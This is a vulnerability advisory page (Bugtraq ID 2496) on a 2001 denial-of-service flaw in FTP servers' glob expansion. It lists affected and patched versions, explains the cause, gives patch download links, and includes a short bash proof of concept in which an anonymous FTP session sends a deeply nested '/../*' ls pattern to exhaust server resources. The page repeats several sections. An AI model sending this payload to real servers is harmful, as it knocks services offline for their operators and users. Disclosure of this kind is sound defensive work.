Multiple Vendor FTP glob Expansion Vulnerability
BID:2496
Info
Multiple Vendor FTP glob Expansion Vulnerability
| Bugtraq ID: | 2496 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 15 2001 12:00AM |
| Updated: | Mar 15 2001 12:00AM |
| Credit: | This vulnerability was announced to the Bugtraq mailing list by Frank DENIS (Jedi/Sector One) <[email protected]> on March 15, 2001. |
| Vulnerable: |
Washington University wu-ftpd 2.6 .0 Washington University wu-ftpd 2.5 .0 Washington University wu-ftpd 2.4.2 academ[BETA1-15] Washington University wu-ftpd 2.4.2 academ[BETA-18] Trolltech ftpd 1.25 Trolltech ftpd 1.24 Trolltech ftpd 1.23 Trolltech ftpd 1.22 Trolltech ftpd 1.21 Sun Solaris 8_x86 Sun Solaris 8_sparc Sun Solaris 7.0_x86 Sun Solaris 7.0 S.u.S.E. Linux 7.2 PureFTPd PureFTPd 0.96 ProFTPD Project ProFTPD 1.2.1 ProFTPD Project ProFTPD 1.2 pre9 ProFTPD Project ProFTPD 1.2 pre8 ProFTPD Project ProFTPD 1.2 pre7 ProFTPD Project ProFTPD 1.2 pre6 ProFTPD Project ProFTPD 1.2 pre5 ProFTPD Project ProFTPD 1.2 pre4 ProFTPD Project ProFTPD 1.2 pre3 ProFTPD Project ProFTPD 1.2 pre2 ProFTPD Project ProFTPD 1.2 pre11 ProFTPD Project ProFTPD 1.2 pre10 ProFTPD Project ProFTPD 1.2 pre1 ProFTPD Project ProFTPD 1.2 .0rc3 ProFTPD Project ProFTPD 1.2 OpenBSD OpenBSD 2.7 OpenBSD OpenBSD 2.6 Mandriva Linux Mandrake 8.0 IBM AIX 4.3 HP HP-UX 11.11 HP HP-UX 11.0 HP HP-UX 10.20 HP HP-UX 10.10 HP HP-UX 10.0 1 FreeBSD FreeBSD 4.2 FreeBSD FreeBSD 3.5.1 Debian Linux 2.2 sparc Debian Linux 2.2 powerpc Debian Linux 2.2 arm Debian Linux 2.2 alpha Debian Linux 2.2 68k Debian Linux 2.2 BeroFTPD BeroFTPD 1.3.4 Apple Mac OS X 10.0.1 Apple Mac OS X 10.0 |
| Not Vulnerable: |
Washington University wu-ftpd 2.6.1 Apple Mac OS X 10.0.2 |
Discussion
Multiple Vendor FTP glob Expansion Vulnerability
Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits.
Globbing generates pathnames from file name patterns used by the shell, eg. wildcards denoted by * and ?, multiple choices denoted by {}, etc.
The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented.
Many FTP servers are vulnerable to a denial of service condition resulting from poor globbing algorithms and user resource usage limits.
Globbing generates pathnames from file name patterns used by the shell, eg. wildcards denoted by * and ?, multiple choices denoted by {}, etc.
The vulnerable FTP servers can be exploited to exhaust system resources if per-user resource usage controls have not been implemented.
Exploit / POC
Multiple Vendor FTP glob Expansion Vulnerability
Contributed by Enrico Kern <[email protected]>:
#!/bin/bash=20
ftp -n FTP-SERVER<<\end=20
quot user anonymous
bin
quot pass [email protected]
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20
Contributed by Enrico Kern <[email protected]>:
#!/bin/bash=20
ftp -n FTP-SERVER<<\end=20
quot user anonymous
bin
quot pass [email protected]
ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
bye=20
end=20
Solution / Fix
Multiple Vendor FTP glob Expansion Vulnerability
Solution:
This issue was remedied in ProFTPD versions later than 1.2.1.
Upgrades are available.
ProFTPD Project ProFTPD 1.2 .0rc3
ProFTPD Project ProFTPD 1.2 pre4
ProFTPD Project ProFTPD 1.2 pre5
ProFTPD Project ProFTPD 1.2 pre8
ProFTPD Project ProFTPD 1.2 pre11
ProFTPD Project ProFTPD 1.2 pre6
ProFTPD Project ProFTPD 1.2 pre1
ProFTPD Project ProFTPD 1.2 pre9
ProFTPD Project ProFTPD 1.2 pre7
ProFTPD Project ProFTPD 1.2 pre3
ProFTPD Project ProFTPD 1.2 pre2
ProFTPD Project ProFTPD 1.2
ProFTPD Project ProFTPD 1.2 pre10
ProFTPD Project ProFTPD 1.2.1
HP HP-UX 10.0 1
HP HP-UX 10.10
HP HP-UX 10.20
HP HP-UX 11.0
HP HP-UX 11.11
Solution:
This issue was remedied in ProFTPD versions later than 1.2.1.
Upgrades are available.
ProFTPD Project ProFTPD 1.2 .0rc3
-
Conectiva proftpd-1.2.5rc1-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/proftpd-1.2.5rc1-1U50_1cl .i386.rpm -
Conectiva proftpd-1.2.5rc1-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/proftpd -1.2.5rc1-1U50_1cl.i386.rpm -
Conectiva proftpd-1.2.5rc1-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/proftpd- 1.2.5rc1-1U50_1cl.i386.rpm -
Conectiva proftpd-1.2.5rc1-1U51_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/proftpd-1.2.5rc1-1U51_1cl .i386.rpm -
Conectiva proftpd-1.2.5rc1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/proftpd-1.2.5rc1-1U60_1cl .i386.rpm -
Conectiva proftpd-1.2.5rc1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/proftpd-1.2.5rc1-1U70_1cl .i386.rpm -
Conectiva proftpd-doc-1.2.5rc1-1U50_1cl.i386.rpm
-
Conectiva proftpd-doc-1.2.5rc1-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/proftpd-doc-1.2.5rc1-1U50 _1cl.i386.rpm -
Conectiva proftpd-doc-1.2.5rc1-1U50_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/proftpd- doc-1.2.5rc1-1U50_1cl.i386.rpm -
Conectiva proftpd-doc-1.2.5rc1-1U51_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/proftpd-doc-1.2.5rc1-1U51 _1cl.i386.rpm -
Conectiva proftpd-doc-1.2.5rc1-1U60_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/proftpd-doc-1.2.5rc1-1U60 _1cl.i386.rpm -
Conectiva proftpd-doc-1.2.5rc1-1U70_1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/proftpd-doc-1.2.5rc1-1U70 _1cl.i386.rpm -
Mandrake proftpd-1.2.5-0.rc1.1.2mdk.i586.rpm
Mandrake Linux 7.2 i586 upgrade.
http://www.linux-mandrake.com/en/ftp.php3 -
Mandrake proftpd-1.2.5-0.rc1.1mdk.i586.rpm
Mandrake Linux 8.0 i586 upgrade.
http://www.linux-mandrake.com/en/ftp.php3 -
Mandrake proftpd-1.2.5-0.rc1.1mdk.i586.rpm
Mandrake Linux 8.1 i586 upgrade.
http://www.linux-mandrake.com/en/ftp.php3 -
Mandrake proftpd-1.2.5-0.rc1.1mdk.ppc.rpm
Mandrake Linux 8.0 PPC upgrade.
http://www.linux-mandrake.com/en/ftp.php3 -
Mandrake proftpd-1.2.5-0.rc1.2mdk.ia64.rpm
Mandrake Linux 8.1 IA64 upgrade.
http://www.linux-mandrake.com/en/ftp.php3 -
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre4
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre5
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre8
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre11
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre6
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre1
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre9
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre7
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre3
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre2
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2 pre10
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
ProFTPD Project ProFTPD 1.2.1
-
ProFTPD Project proftpd-1.2.4.tar.gz
ftp://ftp.proftpd.org/distrib/source/proftpd-1.2.4.tar.gz
HP HP-UX 10.0 1
-
HP PHNE_23947
http://itrc.hp.com
HP HP-UX 10.10
-
HP PHNE_23947
http://itrc.hp.com
HP HP-UX 10.20
-
HP PHNE_23948
http://itrc.hp.com
HP HP-UX 11.0
-
HP PHNE_23949
http://itrc.hp.com
HP HP-UX 11.11
-
HP PHNE_23950
http://itrc.hp.com